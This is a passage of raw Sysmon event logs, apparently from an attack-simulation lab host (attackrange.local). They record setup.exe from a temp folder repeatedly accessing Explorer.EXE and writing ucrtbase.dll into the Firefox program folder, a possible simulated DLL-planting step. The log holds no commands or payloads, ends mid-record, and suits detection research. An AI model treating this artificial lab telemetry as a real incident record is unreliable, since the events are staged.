13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\ucrtbase.dll2021-01-18 13:59:52.552 10341000x800000000000000015430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Window